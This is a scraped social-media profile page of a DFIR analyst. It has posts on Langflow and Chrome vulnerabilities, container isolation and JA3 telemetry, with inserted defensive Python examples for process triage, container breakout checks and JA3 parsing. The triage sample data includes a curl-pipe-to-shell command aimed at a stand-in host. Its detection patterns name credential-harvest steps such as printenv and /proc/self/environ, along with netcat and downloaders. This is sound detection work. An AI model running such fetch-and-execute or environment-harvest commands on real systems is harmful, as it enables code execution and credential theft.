DFIR_TNT

638 posts

@DFIR_TNT

Joined May 2010
1.7K Following · 986 Followers
Florian Roth ⚡️@cyb3rops·
Omg ... Some people talk about Mythos as if some new Oppenheimer had built a bomb. What matters far more for the real security landscape is that open models with Opus 4.5-level capabilities get republished as uncensored versions within days and become effectively impossible to control.
DFIR_TNT reposted
Gadi Evron@gadievron·
Introducing honeyslop: code canaries for open-source maintainers drowning in AI-hallucinated vulnerability reports. A short release thread
DFIR_TNT@DFIR_TNT·
Chrome zero-day #4 in 2026. CVE-2026-5281 — use-after-free in WebGPU, confirmed active exploitation. If you run Chrome in your environment, this isn't a "schedule it" patch. It's a today patch.
DFIR_TNT@DFIR_TNT·
CVE-2025-3248 — Langflow's /api/v1/validate/code executes user-supplied Python before auth. CVSS 9.8. CISA KEV. Post-RCE, attackers run printenv. Langflow holds LLM API keys, database connection strings, and cloud creds. High value density in a single process. #AIAgents
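The post above notes that the first thing attackers do after the Langflow RCE is run printenv. The following is an added example, not code from the original post or from the Langflow project: a triage function over process-creation events shaped like Sysmon Event ID 1 (image, command line, parent image, parent command line). The field names, the regexes and the sample events are this example's assumptions; the parent pattern in particular should be tuned to how Langflow is launched in your environment.

```python
"""Flag credential-harvest and shell children of a Langflow server process.

Added example, not part of the original post or of Langflow. Events are
constructed to look like Sysmon Event ID 1 fields; real telemetry field
names differ by product, so map them before calling triage().
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# A parent that looks like a Langflow server: the `langflow` console script,
# or a Python interpreter started with `-m langflow`. (Assumed launch styles.)
LANGFLOW_PARENT = re.compile(r"(^|[/\\])langflow(\s|$)|-m\s+langflow\b", re.I)

# Children that read the process environment or .env files: printenv, env,
# /proc/self/environ, cat .env ... this is where Langflow keeps LLM API keys,
# database connection strings and cloud credentials.
HARVEST_CHILD = re.compile(
    r"(^|[/\\])printenv(\s|$)|\benv(\s|$)|/proc/self/environ|\.env\b", re.I
)
# Interactive shells and downloaders spawned by a web service are rarely legitimate.
SHELL_CHILD = re.compile(r"(^|[/\\])(sh|bash|dash|zsh|curl|wget|nc|ncat)(\s|$)", re.I)


@dataclass
class ProcEvent:
    image: str
    command_line: str
    parent_image: str
    parent_command_line: str


def triage(ev: ProcEvent) -> Optional[str]:
    """Return a verdict label for one event, or None if it is not interesting."""
    parent = f"{ev.parent_image} {ev.parent_command_line}"
    if not LANGFLOW_PARENT.search(parent):
        return None  # only children of a Langflow server matter here
    child = f"{ev.image} {ev.command_line}"
    if HARVEST_CHILD.search(child):
        return "credential-harvest"
    if SHELL_CHILD.search(child):
        return "shell-or-downloader"
    return None


def triage_all(events: List[ProcEvent]) -> List[Tuple[int, str]]:
    """Index and verdict for every event that triage() flags."""
    hits = []
    for i, ev in enumerate(events):
        verdict = triage(ev)
        if verdict:
            hits.append((i, verdict))
    return hits


# Constructed sample events (not a real capture).
LANGFLOW = ("/usr/local/bin/python3.12",
            "python -m langflow run --host 0.0.0.0 --port 7860")
SAMPLE_EVENTS = [
    ProcEvent("/usr/bin/printenv", "printenv", *LANGFLOW),
    ProcEvent("/bin/sh", "sh -c 'curl http://example.invalid/s | sh'", *LANGFLOW),
    ProcEvent("/usr/bin/git", "git rev-parse HEAD", *LANGFLOW),            # benign child
    ProcEvent("/usr/bin/printenv", "printenv", "/bin/bash", "bash -l"),   # admin at a terminal
]

if __name__ == "__main__":
    for idx, verdict in triage_all(SAMPLE_EVENTS):
        ev = SAMPLE_EVENTS[idx]
        print(f"[{verdict}] {ev.image} <- {ev.parent_command_line}")
```

The rule keys on the parent, not the child: printenv at an admin's shell is noise, printenv under a web service that never needs a shell is the signal. Expect to whitelist whatever legitimate subprocesses your Langflow deployment spawns (git in the sample) before turning this into an alert.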
DFIR_TNT@DFIR_TNT·
The LangFlow CVE-2026-33017 is a good reminder that AI pipeline tools carry the same attack surface as any other application — plus your LLM API keys, your database credentials, and your agent logic. 20 hours to exploitation in the wild with no public POC.
DFIR_TNT@DFIR_TNT·
thehackernews.com/2026/03/critic… 20 hours to exploitation in the wild. No public POC. AI orchestration tools like this have 1 layer of defense; when it fails, it's full 0-auth arbitrary code execution. If you have this exposed, consider it compromised. #aisecurity #zeroday
DFIR_TNT reposted
Unsloth AI@UnslothAI·
You can now fine-tune LLMs with Unsloth then deploy them in @LMStudio! 🦥👾 We made a free notebook to fine-tune FunctionGemma (270M) so it “thinks” before calling tools, then export the model to GGUF for deployment in LM Studio. Notebook: colab.research.google.com/github/unsloth…
LM Studio@lmstudio

We worked with @UnslothAI on a new beginner's guide: How to fine-tune FunctionGemma and run it locally! 🔧 Train FunctionGemma for custom tool calls ✨ Convert it to GGUF + import into LM Studio 👾 Serve it locally and use it in your code! Step-by-step notebook: colab.research.google.com/github/unsloth… Blog post: lmstudio.ai/blog/functiong…

DFIR_TNT@DFIR_TNT·
powershell.exe OR base64 OR "event id" OR sysmon OR wmic OR appdata OR programdata OR hklm OR regasm OR regsvr32 OR hxxp OR spawn) -forensics -learn -guide -gartner
DFIR_TNT@DFIR_TNT·
Hi, it's future me! My best answer: (breach OR attack OR persistence OR compromise OR "lateral movement" OR "hunt" OR "detection" OR "threat actor") (rundll32 OR cmd.exe OR ....
DFIR_TNT reposted
vibecode.dev@vibecodeapp_·
In order for billions of people to "vibe code" we need a tool with the power of Cursor, and the simplicity of ChatGPT. Early Access wave one begins today.
DFIR_TNT reposted
Unit 42@Unit42_Intel·
We have tested CVE-2025-24813. Under specific circumstances, an exploit sent to a vulnerable Apache web server running outdated Tomcat software could lead to remote code execution. We used a 2-step method that resulted in a successful attempt. Details at bit.ly/426Njtp
DFIR_TNT reposted
Kate Gillespie@kateg_tweets·
F Ukraine? Free Ukraine!
DFIR_TNT reposted
Abhay Bhargav@abhaybhargav·
“But containers are isolated processes” is something I heard as recently as 14 days ago, when I was training a class on Cloud Security Incident Management at a Fortune 100 bank. And this was a statement made by a Security Architect at said bank. I nearly choked on the water I was swigging, as I was talking for 3 hours straight. And I had the following convo with him.

A lot of us think of containers like we think of VMs. The fact that they appear to have the same file systems and binaries as a Debian, Ubuntu or an Alpine also further validates that initial (wrong) thought.

Containers are processes that share the OS kernel. They use multiple namespaces like user, file-system, network, etc. They are constrained by cgroups to manage resource usage such as CPU, disk, I/O, network bandwidth, etc. They definitely do *some* isolation, but I see this more as a way to achieve consistent packaging so they run consistently across multiple environments.

The reason why containers are so good at what they do is because they are able to constrain the process they are meant to run (i.e. an app, etc.) in namespaces and cgroups so that they appear isolated. However, this is far from true in most cases because of the way we run containers.

We run containers mostly in orchestration systems, like Kubernetes, Fargate, Cloud Run, Azure Container Instances, etc. When we run them on these orchestration systems, they need to “do things”, i.e. make network calls to internal and external applications, have volumes mounted for persistent access, need access to service accounts (on Kubernetes or the cloud) to access resources on these environments, or several other things.

The isolation offered here is not a security boundary. They are sharing the kernel with other containers that are running on the same underlying (virtual) machine. Attackers can leverage a variety of ways to “break out” of a container, ranging from leveraging volume mounts to be able to write/read or even privilege escalate based on file paths, to compromising service account tokens using RCEs and SSRF attacks to gain access to cloud credentials and subsequently privilege escalate into the cloud for persistence, exfiltration or more.

Coupled with misconfigurations on Kubernetes (which are there quite often) and the underlying cloud (which are also plentiful), and vulnerabilities in the container images themselves (also very common), containers are a great way to break into environments. Attackers often identify vulnerabilities in applications running on containers, and leverage these vulnerabilities to find that they can easily gain privileged access into cloud environments.

So coming back to my original point. Containers are isolated. Yes. But they are isolated for the purposes of great packaging and the subsequent consistency it offers. They are not isolated for security. Not nearly enough.
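The thread above lists the things that turn a namespaced process into a foothold on the host or the cloud: volume mounts, service account tokens, and the kernel the container shares. The following is an added example, not code from the original thread: it reads the two places inside a container where that surface is visible, the CapEff bitmask in /proc/self/status and the bind mounts in /proc/mounts, and reports what an attacker who lands in the container would find. The sample texts are constructed, and the choice of which capabilities and mount points count as "dangerous" is this example's, not a standard; the one real reference value is Docker's default capability set.

```python
"""Inspect a container's own capabilities and mounts for breakout surface.

Added example, not part of the original thread. The lists of dangerous
capabilities and mount points are this example's choices; the sample
/proc texts below are constructed.
"""
import re
from typing import Dict, List

# Capability bit numbers from linux/capability.h. Any of these lets a process
# reach past the namespace fence: mount filesystems, ptrace host pids, load
# modules, read arbitrary host files, reconfigure the network, load BPF.
DANGEROUS_CAPS = {
    2: "CAP_DAC_READ_SEARCH", 12: "CAP_NET_ADMIN", 16: "CAP_SYS_MODULE",
    17: "CAP_SYS_RAWIO", 19: "CAP_SYS_PTRACE", 21: "CAP_SYS_ADMIN", 39: "CAP_BPF",
}
# Files Docker always bind-mounts from the host; they are not a finding.
DOCKER_DEFAULT_BINDS = {"/etc/hosts", "/etc/hostname", "/etc/resolv.conf"}
BLOCK_FS = {"ext4", "xfs", "btrfs", "zfs"}


def parse_capeff(status_text: str) -> int:
    """Pull the effective capability mask out of /proc/self/status text."""
    m = re.search(r"^CapEff:\s*([0-9a-fA-F]+)", status_text, re.M)
    if not m:
        raise ValueError("CapEff line not found")
    return int(m.group(1), 16)


def dangerous_caps(capeff: int) -> List[str]:
    """Names of the dangerous capabilities set in the mask, in bit order."""
    return [name for bit, name in sorted(DANGEROUS_CAPS.items()) if (capeff >> bit) & 1]


def risky_mounts(proc_mounts: str) -> List[str]:
    """Findings for /proc/mounts lines: '<dev> <mountpoint> <fstype> <opts> 0 0'."""
    findings = []
    for line in proc_mounts.splitlines():
        fields = line.split()
        if len(fields) < 4:
            continue
        _dev, mp, fstype, opts = fields[:4]
        rw = "rw" in opts.split(",")
        if mp.endswith(("docker.sock", "containerd.sock", "crio.sock")):
            findings.append(f"{mp}: container runtime socket; root on the host for anyone who can use it")
        elif mp.endswith("kubernetes.io/serviceaccount"):
            findings.append(f"{mp}: service account token; readable through any RCE or file-read SSRF")
        elif fstype in BLOCK_FS and mp != "/" and mp not in DOCKER_DEFAULT_BINDS and rw:
            findings.append(f"{mp}: writable host path bind mount")
        elif fstype in ("cgroup", "cgroup2") and rw:
            findings.append(f"{mp}: writable cgroup fs (release_agent escapes also need CAP_SYS_ADMIN)")
    return findings


def assess(status_text: str, proc_mounts: str) -> Dict[str, List[str]]:
    """Combine both checks; on a live container pass the real /proc texts."""
    return {"caps": dangerous_caps(parse_capeff(status_text)), "mounts": risky_mounts(proc_mounts)}


# Constructed samples. The CapEff value is Docker's default (unprivileged) set.
SAMPLE_STATUS = "Name:\tpython3\nCapInh:\t0000000000000000\nCapEff:\t00000000a80425fb\n"
PRIVILEGED_STATUS = "CapEff:\t000001ffffffffff\n"   # --privileged: every capability
SAMPLE_MOUNTS = """\
overlay / overlay rw,relatime,lowerdir=/var/lib/docker/overlay2/l/abc 0 0
proc /proc proc rw,nosuid,nodev,noexec,relatime 0 0
cgroup2 /sys/fs/cgroup cgroup2 ro,nosuid,nodev,noexec,relatime 0 0
/dev/sda1 /etc/resolv.conf ext4 rw,relatime 0 0
/dev/sda1 /etc/hosts ext4 rw,relatime 0 0
/dev/sda1 /etc/hostname ext4 rw,relatime 0 0
/dev/sda1 /data ext4 rw,relatime 0 0
tmpfs /var/run/secrets/kubernetes.io/serviceaccount tmpfs ro,relatime,size=1024k 0 0
tmpfs /var/run/docker.sock tmpfs rw,nosuid,nodev,size=3276800k,mode=755 0 0
"""

if __name__ == "__main__":
    # Inside a real container: assess(open("/proc/self/status").read(), open("/proc/mounts").read())
    for key, items in assess(SAMPLE_STATUS, SAMPLE_MOUNTS).items():
        print(key, items)
```

Two design notes. The host-path heuristic keys on a block filesystem mounted anywhere but `/` (the container rootfs is overlay), which is why Docker's three default `/etc` binds have to be allow-listed or every container lights up. And the capability check is deliberately a read of CapEff rather than of the orchestrator's spec: what the kernel actually granted is what an attacker gets, whatever the pod YAML says.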
DFIR_TNT reposted
Olaf Hartong@olafhartong·
I love the development the MDE team puts into expanding the telemetry! Our slackbot informed me JA3 / JA3S hashes are now recorded. Pretty cool for hunting and detection engineering!
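For hunting on the JA3 values the post says MDE now records, it helps to see exactly what the hash is built from. The following is an added example, not code from the original post or from Microsoft: a parser that takes a TLS record carrying a ClientHello and derives the JA3 string (ClientHello version, cipher suites, extension types, supported groups, EC point formats, GREASE values stripped) and its MD5. The ClientHello is assembled by `build_client_hello()` in the block itself so that it runs offline; it is constructed, not a capture.

```python
"""Compute a JA3 fingerprint from a TLS ClientHello record.

Added example, not code from the original post or from Microsoft. The
ClientHello used below is constructed by build_client_hello(), not captured.
"""
import hashlib
import struct
from typing import Iterable, List, Tuple

# RFC 8701 GREASE values (0x0a0a, 0x1a1a, ... 0xfafa) are random per connection,
# so JA3 drops them from the cipher, extension and group lists before hashing.
GREASE = {(v << 8) | v for v in range(0x0A, 0x100, 0x10)}
SUPPORTED_GROUPS, EC_POINT_FORMATS = 10, 11


def _u16(buf: bytes, off: int) -> int:
    return struct.unpack_from("!H", buf, off)[0]


def ja3(record: bytes) -> Tuple[str, str]:
    """Return (ja3_string, ja3_md5) for one TLS record carrying a ClientHello."""
    if len(record) < 5 or record[0] != 0x16:
        raise ValueError("not a TLS handshake record")
    hs = record[5:5 + _u16(record, 3)]
    if hs[0] != 0x01:
        raise ValueError("handshake message is not a ClientHello")
    body = hs[4:4 + int.from_bytes(hs[1:4], "big")]
    version = _u16(body, 0)            # JA3 uses the ClientHello version, not the record version
    off = 2 + 32                       # skip random
    off += 1 + body[off]               # skip session id
    cs_len = _u16(body, off)
    off += 2
    ciphers = [_u16(body, off + i) for i in range(0, cs_len, 2)]
    off += cs_len
    off += 1 + body[off]               # skip compression methods
    exts: List[int] = []
    groups: List[int] = []
    formats: List[int] = []
    if off + 2 <= len(body):
        end = off + 2 + _u16(body, off)
        off += 2
        while off + 4 <= end:
            etype, elen = _u16(body, off), _u16(body, off + 2)
            data = body[off + 4:off + 4 + elen]
            off += 4 + elen
            exts.append(etype)
            if etype == SUPPORTED_GROUPS:                  # 2-byte list length, 2-byte entries
                groups = [_u16(data, 2 + i) for i in range(0, _u16(data, 0), 2)]
            elif etype == EC_POINT_FORMATS:                # 1-byte list length, 1-byte entries
                formats = list(data[1:1 + data[0]])

    def field(vals: Iterable[int]) -> str:
        return "-".join(str(v) for v in vals if v not in GREASE)

    s = ",".join([str(version), field(ciphers), field(exts), field(groups), field(formats)])
    return s, hashlib.md5(s.encode()).hexdigest()


def _ext(etype: int, data: bytes) -> bytes:
    return struct.pack("!HH", etype, len(data)) + data


def build_client_hello(version: int, ciphers: List[int],
                       extensions: List[Tuple[int, bytes]]) -> bytes:
    """Assemble a minimal TLS record + ClientHello (constructed; zero random)."""
    body = struct.pack("!H", version) + bytes(32) + b"\x00"   # version, random, empty session id
    body += struct.pack("!H", 2 * len(ciphers)) + b"".join(struct.pack("!H", c) for c in ciphers)
    body += b"\x01\x00"                                        # one compression method: null
    ext_blob = b"".join(_ext(t, d) for t, d in extensions)
    body += struct.pack("!H", len(ext_blob)) + ext_blob
    hs = b"\x01" + len(body).to_bytes(3, "big") + body
    return b"\x16\x03\x01" + struct.pack("!H", len(hs)) + hs


# Constructed sample: a TLS 1.2-framed hello offering 1.3, with GREASE in all three lists.
SAMPLE_HELLO = build_client_hello(
    0x0303,
    [0x1A1A, 0x1301, 0x1302, 0xC02B, 0xC02F],                  # GREASE, then real suites
    [
        (0x2A2A, b""),                                         # GREASE extension
        (0, b"\x00\x10\x00\x00\x0dexample.local"),             # server_name
        (10, b"\x00\x06\x0a\x0a\x00\x1d\x00\x17"),             # supported_groups: GREASE, x25519, secp256r1
        (11, b"\x01\x00"),                                     # ec_point_formats: uncompressed
        (13, b"\x00\x04\x04\x03\x08\x04"),                     # signature_algorithms
        (43, b"\x04\x03\x04\x03\x03"),                         # supported_versions: 1.3, 1.2
    ],
)

if __name__ == "__main__":
    print(*ja3(SAMPLE_HELLO), sep="\n")
```

The sample yields the string `771,4865-4866-49195-49199,0-10-11-13-43,29-23,0` before hashing. Two caveats for hunting: JA3S is the server-side counterpart over the ServerHello (version, chosen cipher, extension types), so the pair identifies a client/server combination rather than a client alone; and clients that randomize ClientHello extension order (Chrome has done so since 2023) change their JA3 from connection to connection, which is why JA4 sorts the lists. Treat a JA3 as a pivot, not an identity.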
DFIR_TNT reposted
Barb McQuade@BarbMcQuade·
Happy #InternationalWomensDay. It inspires me to think about how far we have come in my lifetime. It motivates me to think about how far we still have to go.